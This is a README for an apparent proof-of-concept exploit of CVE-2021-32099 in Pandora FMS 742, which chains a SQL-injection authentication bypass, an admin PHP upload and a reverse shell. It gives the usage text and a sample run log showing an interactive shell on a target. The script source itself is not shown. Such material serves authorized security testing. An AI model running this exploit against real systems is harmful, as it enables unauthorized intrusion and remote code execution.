# [CVE-2021-32099](https://nvd.nist.gov/vuln/detail/CVE-2021-32099) PoC

This repository provides a **Proof of Concept (PoC)** exploit for the **[CVE-2021-32099](https://nvd.nist.gov/vuln/detail/CVE-2021-32099)** vulnerability, affecting **Pandora FMS 742**. The exploit shows how an unauthenticated attacker can leverage a SQL injection vulnerability to escalate an unprivileged session to an administrator-level account. With administrative access, the attacker can upload an arbitrary PHP file via the Pandora FMS File Manager, resulting in remote code execution and compromising the server as the web server user.

---
### :warning: DISCLAIMER  
This project is intended **for educational, research, and authorized security testing purposes only**.  
**Do not use this code on systems you do not own or have explicit permission to test.**  
The author is **not responsible** for any damage or misuse.

---
### Installation
```shell
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt
```

### Usage

```
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py                                                           
usage: python3 ./CVE-2021-32099.py [--target TARGET] [--lhost LHOST] [--lport LPORT]

options:
  --target TARGET  Full URL of the vulnerable Pandora FMS instance.
  --lhost LHOST    IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally.
  --lport LPORT    Port number the reverse shell listener will bind to.

Example: python3 ./CVE-2021-32099.py --target http://target.com --lhost 10.10.14.157 --lport 4444
```

### Example
```
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py --target http://localhost --lhost 10.10.14.81 --lport 4444
[+] Bypassing authentication...OK
[+] Uploading reverse shell...OK
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.129.177.29 on port 37308
[+] Executing reverse shell...
[*] Switching to interactive mode
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:59:07 up 17:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$  
```
